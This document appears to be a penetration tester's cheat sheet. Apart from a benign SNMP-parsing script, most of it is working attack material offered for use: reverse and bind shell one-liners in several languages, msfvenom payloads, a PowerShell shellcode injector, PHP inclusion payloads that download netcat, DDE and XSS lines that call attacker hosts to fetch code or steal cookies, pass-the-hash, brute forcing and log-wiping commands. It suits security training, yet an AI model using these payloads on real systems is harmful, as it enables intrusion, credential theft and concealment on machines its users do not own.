https://github.com/frizb/Vanquish
This is a multithreaded python program to scan for files on web servers
# python3 opendoor.py --host http://192.168.152.10 -p 9090 --scan=directories -t 50
############################################################
#                   [OPEN DOOR ASCII banner]               #
# Directories: 36994                                       #
# Subdomains: 181018                                       #
# Browsers: 112                                            #
# Proxies: 204                                             #
# License: GNU General Public License                      #
############################################################
[08:33:03] warning: Threads has been reduced to 25 (max) instead of 50
[08:33:03] info: Use --report param to store your scan results
[08:33:03] info: Wait, please, checking connect to -> 192.168.152.10:9090 ...
[08:33:03] info: Server 192.168.152.10:9090 (192.168.152.10) is online!
[08:33:03] info: Scanning 192.168.152.10 ...
[08:33:03] info: 0.1% [00028/36994] - 0B - Denied http://192.168.152.10:9090/..;/
[08:33:08] info: 3.2% [01173/36994] - 0B - http://192.168.152.10:9090/325/
[08:33:08] warning: skip [00000/36994] - Ignored /404.php
[08:33:20] info: 11.4% [04205/36994] - 0B - Denied http://192.168.152.10:9090/a%5c.asp
[08:33:20] info: 11.4% [04208/36994] - 0B - Denied http://192.168.152.10:9090/a%5c.php
[08:33:20] info: 11.4% [04208/36994] - 0B - Denied http://192.168.152.10:9090/a%5c.aspx
[08:34:03] info: 40.7% [15043/36994] - 306B - http://192.168.152.10:9090/erika/
[08:34:03] warning: skip [00000/36994] - Ignored /error.php
[08:34:05] info: 42.4% [15674/36994] - 946B - OK http://192.168.152.10:9090/favicon.ico
[08:34:17] info: 51.7% [19114/36994] - 0B - http://192.168.152.10:9090/include.inc
[08:34:17] warning: skip [00000/36994] - Ignored /index.php
[08:34:17] info: 51.8% [19148/36994] - 1KB - OK http://192.168.152.10:9090/index.html
[08:34:26] info: 58.3% [21578/36994] - 1KB - OK http://192.168.152.10:9090/login/
[08:34:48] info: 74.1% [27404/36994] - 2KB - OK http://192.168.152.10:9090/products/
[08:34:57] info: 80.3% [29693/36994] - 3KB - OK http://192.168.152.10:9090/search/
[08:35:27] info: 100.0% [36991/36994] - 0B - http://192.168.152.10:9090/~tmp/
+-------------------------------+-----------+
| Statistics (192.168.152.10) | Summary |
|-------------------------------+-----------|
| failed | 36982 |
| bad | 4 |
| ignored | 3 |
| success | 5 |
| items | 36994 |
| workers | 25 |
+-------------------------------+-----------+
[08:35:27] debug: Total time running: 0:02:23.799132
# nmap -sT -p111,1039,1047,1048,2049 -A 10.11.1.1-254 -oG lab_nfs_servers.txt
# egrep 'filtered|open' lab_nfs_servers.txt | awk '{ print $2 }' > lab_nfs_ips.txt
# nmap -p 111 --script nfs* -iL lab_nfs_ips.txt
https://www.exploit-db.com/google-hacking-database/
site:"megacorpone.com" -site:"www.megacorpone.com" filetype:ppt "penetration"
intitle:"VNC viewer for Java"
inurl:"robots.txt"
intitle:"-N3t" filetype:php undetectable -Sites compromised with backdoor
host -t ns megacorpone.com
host -t mx megacorpone.com
host -l megacorpone.com ns1.megacorpone.com -Check for zone transfer
nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
dnsenum
theharvester -d cisco.com -b google >google.txt -Email harvest from google.com
nmap 10.1.1.0/24 --exclude 10.1.1.34 10.1.1.45
# use good and avoid files
echo 10.1.1.34 10.1.1.45 > avoid.txt
echo 10.1.1.0/24 > good.txt
nmap -iL good.txt --excludefile avoid.txt
nmap -Pn --top-ports 20 192.168.186.0/24 --open -T4
nmap -sn 192.168.1.0/24 -oG ping-sweep-nmap.txt
grep Up ping-sweep-nmap.txt | cut -d " " -f 2
nmap -p 80 192.168.1.0/24 -oG web-sweep.txt
grep open web-sweep.txt | cut -d " " -f 2
We will host a socks4 proxy on 127.0.0.1:8080 and ssh to a machine with access to the 172.16.152.0/24 network
# Edit /etc/proxychains.conf and add the following after [ProxyList]
[kali@kali:~]$ grep socks4 /etc/proxychains.conf | grep -v "^#"
socks4 127.0.0.1 8080
# ssh to the Debian machine using the -D argument specifying the dynamic connection and list socket 127.0.0.1:8080 as the proxy
[kali@kali:~]$ sudo ssh -N -D 127.0.0.1:8080 [email protected]
You must prepend your command with proxychains. Be sure you don't use the nmap "-sS" (TCP SYN scan): proxychains only relays full TCP connections, so use "-sT" instead.
[kali@kali:~]$ proxychains nmap --top-ports=20 -sT -Pn 172.16.152.5
nmap -sT -A --top-ports 20 192.168.1.0/24 --open -oG top-port.txt
nmap -v -p 80 --script all 192.168.1.1
$ sudo nmap 192.168.152.44 -p- -sV -vv --open --reason -oX 192.168.152.44.xml
smbclient -L //192.168.186.147 (commands - list, dir, mget * )
rpcclient -U "" 192.168.1.1
smbclient -U testuser //localhost/report-upload/
no password, hit <Enter>
if logged in, try srvinfo
enum4linux -v 192.168.152.109
nmap -p 139,445 --script smb-enum-users 192.168.1.0/24
nmap -p 135,139,445 --script smb-enum-shares 192.168.1.0/24
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.201
/root/mega/exploits/samba28 (made of 10.c) use exploit/linux/samba/trans2open (Unix Samba 2.2.0 to 2.2.8)
./samba28 -b 0 -v 10.11.1.28
use exploit/multi/samba/usermap_script (Samba 3.0.20 - 3.0.25)
use exploit/linux/samba/lsa_transnames_heap -Linux 3.0.21-3.0.24
EternalBlue (zzz_exploit.py creating user cplsec P@ssw0rd123! on the target)
nmap --script smtp-enum-users.nse -p 25,465,587 10.11.1.1-254 -oA .
Nmap scan report for 10.11.1.227
Host is up (0.049s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
nc -nv 192.168.1.2 25
HELO a
EXPN root -Enumeration
VRFY user -Enumeration
Writing mail:
MAIL FROM:root
RCPT TO:root
DATA Hello there
.
Enum automation:
for user in $(cat users.txt); do echo VRFY $user | nc -nv 192.168.1.2 25 2>/dev/null | grep ^"250"; done -Does not always work
use smtp-user-enum script from pentestmonkey
SNMP (udp 161):
onesixtyone -c community_strings.txt -i listIP.txt
onesixtyone -c snmp_strings.txt -i hosts.txt | cut -d " " -f 1 >> snmp_hosts.txt
I prefer to use snmp-check because it gives you a full useful report
# for ip in $(cat ips.txt); do snmp-check $ip; done
snmpwalk is good to enumerate individual MIBs
snmpwalk -c public -v1 -t 10 10.11.1.14
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: x86 Family 6 Model 12 Stepping 2 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (2005539644) 232 days, 2:56:36.44
iso.3.6.1.2.1.1.4.0 = ""
$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25
iso.3.6.1.4.1.77.1.2.25.1.1.3.98.111.98 = STRING: "bob"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.8.73.85.83.82.95.66.79.66 = STRING: "IUSR_BOB"
$ snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idle Process"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System"
iso.3.6.1.2.1.25.4.2.1.2.224 = STRING: "smss.exe"
iso.3.6.1.2.1.25.4.2.1.2.324 = STRING: "csrss.exe"
iso.3.6.1.2.1.25.4.2.1.2.364 = STRING: "wininit.exe"
$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.18646 = INTEGER: 21
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.45310 = INTEGER: 80
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.24806 = INTEGER: 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.45070 = INTEGER: 443
$ snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "LiveUpdate 3.3 (Symantec Corporation)"
iso.3.6.1.2.1.25.6.3.1.2.2 = STRING: "WampServer 2.5"
iso.3.6.1.2.1.25.6.3.1.2.3 = STRING: "VMware Tools"
iso.3.6.1.2.1.25.6.3.1.2.4 = STRING: "Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148"
iso.3.6.1.2.1.25.6.3.1.2.5 = STRING: "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030"
# users
code="1.3.6.1.4.1.77.1.2.25"
for host in $(cat ips.txt); do echo -e "---------\nhost:$host\n-----------";snmpwalk -c public -v1 $host $code; done
# software Name
code="1.3.6.1.2.1.25.6.3.1.2"
for host in $(cat ips.txt); do echo -e "---------\nhost:$host\n-----------";snmpwalk -c public -v1 $host $code; done
# useful OIDs
1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
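As an added illustration (not part of the original notes), the following Python decodes the snmpwalk output shown above: in the user table and the tcpConnTable the data sits in the OID index itself (length-prefixed ASCII codes, and an address/port 4-tuple), which is why a readable community string discloses account names and bound ports even before the value column is read. The sample lines are constructed from the walks above, with one unrelated sysUpTime row added.

```python
import re

# Columns whose OID *index* carries the interesting data (from the snmpwalk output above):
USER_TABLE = "1.3.6.1.4.1.77.1.2.25.1.1"   # LanMgr svUserName: index = <len>.<ASCII codes>
TCP_CONN_TABLE = "1.3.6.1.2.1.6.13.1.3"     # tcpConnLocalPort: index = laddr(4).lport.raddr(4).rport

# "<oid> = <TYPE>: <value>"; the type is absent on empty-string rows such as `= ""`
LINE_RE = re.compile(r"^(\S+)\s*=\s*(?:([A-Za-z-]+):\s*)?(.*)$")


def normalize_oid(oid: str) -> str:
    """snmpwalk prints 'iso.3.6.1...' when no MIBs are loaded; 'iso' is arc 1."""
    if oid.startswith("iso."):
        return "1." + oid[len("iso."):]
    return oid.lstrip(".")


def parse_line(line: str):
    """Return (oid, type, value) for one snmpwalk line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    oid, typ, value = m.groups()
    return normalize_oid(oid), typ, value.strip().strip('"')


def decode_user_index(suffix: str) -> str:
    """svUserTable index: first arc is the name length, the rest are ASCII codes."""
    arcs = [int(a) for a in suffix.split(".")]
    length, codes = arcs[0], arcs[1:]
    if length != len(codes):
        raise ValueError(f"length arc {length} does not match {len(codes)} code arcs")
    return "".join(chr(c) for c in codes)


def decode_tcp_index(suffix: str):
    """tcpConnTable index: localAddr(4 arcs).localPort.remAddr(4 arcs).remPort."""
    arcs = suffix.split(".")
    if len(arcs) != 10:
        raise ValueError(f"expected 10 index arcs, got {len(arcs)}")
    local = (".".join(arcs[0:4]), int(arcs[4]))
    remote = (".".join(arcs[5:9]), int(arcs[9]))
    return local, remote


def summarize(walk_output: str) -> dict:
    """Reduce raw snmpwalk text to what it discloses: account names and bound TCP ports."""
    users, bound_ports, other = [], [], 0
    for raw in walk_output.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        oid, _typ, value = parsed
        if oid.startswith(USER_TABLE + "."):
            name = decode_user_index(oid[len(USER_TABLE) + 1:])
            if name != value:                       # index and STRING value must agree
                raise ValueError(f"index {name!r} != value {value!r}")
            users.append(name)
        elif oid.startswith(TCP_CONN_TABLE + "."):
            (laddr, lport), (raddr, _rport) = decode_tcp_index(oid[len(TCP_CONN_TABLE) + 1:])
            if int(value) != lport:                 # this column's value is the local port
                raise ValueError(f"value {value} != index port {lport}")
            # remote 0.0.0.0 means no peer, i.e. a listening socket; Windows agents
            # fill the remote-port arc with an arbitrary number on such rows (as above)
            if raddr == "0.0.0.0":
                bound_ports.append((laddr, lport))
        else:
            other += 1
    return {"users": users, "bound_ports": bound_ports, "other_rows": other}


# Constructed sample, copied from the walks shown above (one unrelated sysUpTime row added)
SAMPLE = """\
iso.3.6.1.4.1.77.1.2.25.1.1.3.98.111.98 = STRING: "bob"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.8.73.85.83.82.95.66.79.66 = STRING: "IUSR_BOB"
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.18646 = INTEGER: 21
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.45310 = INTEGER: 80
iso.3.6.1.2.1.1.3.0 = Timeticks: (2005539644) 232 days, 2:56:36.44
"""

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Pointing summarize() at a saved `snmpwalk -c public -v1 <host>` dump gives the same inventory a defender should expect an unauthenticated v1/v2c agent to be leaking.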
VNC:
vncviewer 192.168.1.116::5901
hydra -p "password" vnc://192.168.1.117:5901
hydra -P /usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt -s 5901 192.168.1.116 vnc
while true;do bash -i >& /dev/tcp/IP/1337 0>&1;nc -e /bin/sh IP 1337;perl -e 'use Socket;$i="IP";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';php -r '$sock=fsockopen("IP",1337);exec("/bin/sh -i <&3 >&3 2>&3");';ruby -rsocket -e'f=TCPSocket.open("IP",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)';sleep 5;done
bash -i >& /dev/tcp/10.11.0.76/444 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.114.137 443 >/tmp/f
Add SSH keys: ssh-keygen -t rsa -b 2048
root.c:
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
rm -f /tmp/p; mknod /tmp/p p && nc <attacker-ip> 4444 0</tmp/p | /bin/sh 1>/tmp/p
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker-ip> 80 0</tmp/p | /bin/sh 1>/tmp/p
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import pty; pty.spawn("/bin/bash")'
Linux:
wget -O exploit.c https://www.exploit-db.com/exploits/18411 -CVE 2012-0056 root for >=2.6.39 (Ubuntu 11.10, kernel 3.0.0-12)
gcc exploit.c -o exploit -Compile to binary
Get Win compiler:
sudo apt-get install mingw-w64
i686-w64-mingw32-gcc slmail-win-fixed.c -lws2_32 -o s.exe -For x86
x86_64-w64-mingw32-gcc -o main64.exe main.c -For x64
i586-mingw32msvc-gcc file_name.c -lws2_32 -o exploit.exe
wine exploit.exe -To run Windows file in Linux
Windows:
wget -O ms11-080.py https://www.exploit-db.com/exploits/18176 -MS11-080 (WinXP and 2003)
python pyinstaller.py --onefile ms11-080.py -Create an exe out of python
xfreerdp /u:administrator /d:thinc /pth:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e /v:10.11.1.221
Find and remove ossec-alerts.log, access.log, httpd-access.log
echo > .bash_history
DDE injection in xlsx
=cmd|'/c powershell.exe -w hidden $e=(Copy-Item -Path c:\Te\12345.txt -Destination C:\Users\test\12345); powershell -e $e'!A1
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://1.2.3.4/test.exe\"); powershell -e $e'!A1
HTTP2 https://www.youtube.com/watch?v=YHOnxlQ6zec
In wireshark: http2.data.data && http2 contains username
nghttp -v -u http://http2.sec642.org/../../../../etc/passwd doesn't work, need to be encoded
curl2 --http2 http://http2.sec642.org/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
curl --http2-prior-knowledge --data "status=on" http://localhost:8080/index.ph
connect-msolservice -credential $msolcred
Get-MsolUser -All | ft -AutoSize
Kali nc -nv 192.168.152.10 110
Kali nc -nv 192.168.152.10 4444
Windows nc.exe -nlvp 4444
Kali nc -nv 192.168.152.10 4444 < /usr/share/windows-binaries/wget.exe
Windows nc.exe -nlvp 4444 > wget.exe
There is no output letting you know when the transfer is complete
Windows listens on port 4444, runs cmd.exe
Windows nc.exe -nlvp 4444 -e cmd.exe
Kali nc -nv 192.168.152.10 4444
$client = New-Object System.Net.Sockets.TCPClient("192.168.119.152",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
sudo nc -nlvp 4242
Windows nc.exe -nlvp 4444
Kali nc -nv 192.168.152.10 4444 -e /bin/bash
Windows You will not see a Linux prompt
Note: we are hosting netcat on the source system (192.168.119.152) at nc.exe.txt
http://192.168.152.10/menu.php?file=data:text/plain,<?php echo shell_exec("certutil -urlcache -split -f http://192.168.119.152/nc.exe.txt c:\windows\system32\nc.exe") ?>
http://192.168.152.10/menu.php?file=data:text/plain,<?php echo shell_exec("nc.exe -nlvp 4444 -e cmd.exe") ?>
# connect to the bind shell from attacker machine
# nc -nv 192.168.152.10 4444
<?php shell_exec("bash -i >& /dev/tcp/10.11.0.61/5555 0>&1") ?>
<?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?>
<?php $sock=fsockopen("10.11.0.61",5555);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Good info on windows assembly and exploits: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
https://github.com/Screetsec/TheFatRat
https://github.com/Yt1g3r/CVE-2018-8174_EXP
List payloads
msfvenom -l
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Use shellpop to create a reverse shell with a python stager
# shellpop --payload linux/reverse/tcp/php --host tun0 --port 4444 --handler --base64 --stager http
Copy the generated code into our exploit
payload = "<?php echo shell_exec('echo cHl0aG9uIC1jICJmcm9tIHJlcXVlc3RzIGltcG9ydCBnZXQ7aW1wb3J0IG9zO29zLnN5c3RlbShnZXQoJ2h0dHA6Ly8xOTIuMTY4LjExOS4xNTI6ODAvRHJkclhhaFknKS50ZXh0KSIg|base64 -d|/bin/bash') ?>"
Listen locally on port 4444:
# nc -nlvp 4444
Run the exploit to invoke the payload and have the target connect back to you on port 4444
If you uploaded the payload, call it with curl or alternative
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=4444 -f powershell
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x77,0x98,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
One command at a time:
service postgresql start
sudo msfdb init
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
exploit
All at once:
msfconsole -x "use exploit/multi/handler; set RHOST 192.168.152.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit"
This file will:
- Use the native certutil.exe to download nc.exe.txt from the Kali box and save it as C:\windows\system32\nc.exe
- Create a listening socket on TCP 4444 (Windows machine)
#include <stdlib.h>
#include <windows.h>
int main ()
{
int i;
i = system ("certutil -urlcache -split -f http://192.168.119.152/nc.exe.txt c:\\windows\\system32\\nc.exe");
Sleep(10000); // 10 seconds (10000 milliseconds)
i = system ("nc.exe -nlvp 4444 -e cmd.exe");
return 0;
}
sudo i686-w64-mingw32-gcc winshell.c -o winshell.exe
nc -nv 192.168.152.10 4444
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 EXITFUNC=thread -e x86/xor_dynamic -b "\x00\x09\x0a\x1a\x10" -f python
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x09\x0a\x1a\x10" -f python
sudo service postgresql start
sudo msfdb init
msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.152.10
rhost => 192.168.152.10
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.152.10:4444
[*] Sending stage (180291 bytes) to 192.168.152.10
[*] Meterpreter session 1 opened (192.168.119.152:33035 -> 192.168.152.10:4444) at 2020-04-06 02:55:29 -0400
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
For all shellcode see 'msfvenom --help-formats' for information on valid parameters. msfvenom will output code that can be cut and pasted into your exploits in that language.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler: 'msfconsole -L -r '
username: tom' or 1=1 LIMIT 1;#
Cheatsheet https://owasp.org/www-community/xss-filter-evasion-cheatsheet
<script>alert('XSS')</script>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
# Start a listener on your attacking machine
sudo nc -nvlp 4444
# input the code below into the vulnerable application
<iframe src=http://192.168.119.152:4444/report height="0" width="0"></iframe>
# Start a listener on your attacking machine
sudo nc -nvlp 80
# input the code below into the vulnerable web app
<script>new Image().src="http://192.168.119.152/cool.jpg?output="+document.cookie;</script>
Use the Firefox add-on "Cookie Editor" to use the cookie: https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.152 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
Run this from Windows Command Prompt
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
This will run an SMB server called \\kali on your machine
sudo impacket-smbserver kali /home/kali -smb2support -username kali -password kali
On Windows host (target machine connecting back to your new smb share)
net use k: \\192.168.119.152\kali /user:kali kali
The command completed successfully.
C:\>k:
K:\>
We are trying to forward traffic on local socket 192.168.152.10:4455 to remote socket 172.16.152.5:445
Windows 2016 Server: 172.16.152.5 Windows 10 Client: 192.168.152.10
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=192.168.152.10 connectport=445 connectaddress=172.16.152.5
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.152.10 localport=4455 action=allow
$ grep "SMB2" "/etc/samba/smb.conf"
min protocol = SMB2
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //192.168.152.10/Data -o username=Administrator,password=lab /mnt/win10_share
ls -l /mnt/win10_share/
To forward local port 3306 (from target) to the attacker (192.168.119.152) local port 1235 run the following command:
cmd /c echo y | plink.exe -batch -ssh -l kali -pw kali -R 192.168.119.152:1235:127.0.0.1:3306 192.168.119.152
Execution Policy Unrestricted
set-executionpolicy unrestricted
